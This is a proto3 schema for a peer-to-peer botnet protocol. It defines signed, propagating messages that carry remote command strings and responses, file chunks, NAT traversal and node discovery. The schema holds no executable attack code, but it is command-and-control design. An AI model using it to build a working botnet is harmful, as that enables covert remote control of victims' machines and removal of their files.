syntax = "proto3";
package botnet_p2p;

message Message {
    enum MessageType {
        UNDEFINED = 0;
        COMMAND = 1;
        RESPONSE = 2;
        FILE_CHUNK = 3;
        NAT_REQUEST = 4;
        NAT_CHECK = 5;
        PING = 6;
        LEAVE = 7;
        FIND_NODE = 8;
        FOUND_NODES = 9;
    }
    enum Status {
        FAIL = 0;
        OK = 1;
    }

    message NodeDescription {
        uint64 guid = 1;
        string IP = 2;
        string Port = 3;
        bool isNAT = 4;
    }

    message Command {
        string commandString = 1;
        bool sendResponse = 2;
    }

    message Response {
        string value = 1;
        Status status = 2;
    }
    
    message FileChunk {
        string path = 1;
        bool name = 2;
        uint32 chunkNumber = 3;
        uint32 allChunks = 4;
        uint32 chunkSize = 5;
        bytes data = 6;
    }

    message NATRequest {
        uint64 target = 1;
    }

    message NATCheck {
        uint64 source = 1;
    }
    
    message Leave {
        uint64 guid = 1;
    }
    
    message FindNode {
        uint64 guid = 1;
    }
    
    message FoundNodes {
        repeated NodeDescription nodes = 1;
    }
    

    uint64 uuid = 1;
    MessageType type = 2;
    string sender = 3;
    string receiver = 4;
    bool propagation = 5;
    bytes signature = 6;
    oneof payload {
        Command pCommand = 7;
        Response pResponse = 8;
        FileChunk pFile = 9;
        NATRequest pNATRequest = 10;
        NATCheck pNATCheck = 11;
        Leave pLeave = 12;
        FindNode pFindMode = 13;
        FoundNodes pFoundNodes = 14;        
    }
}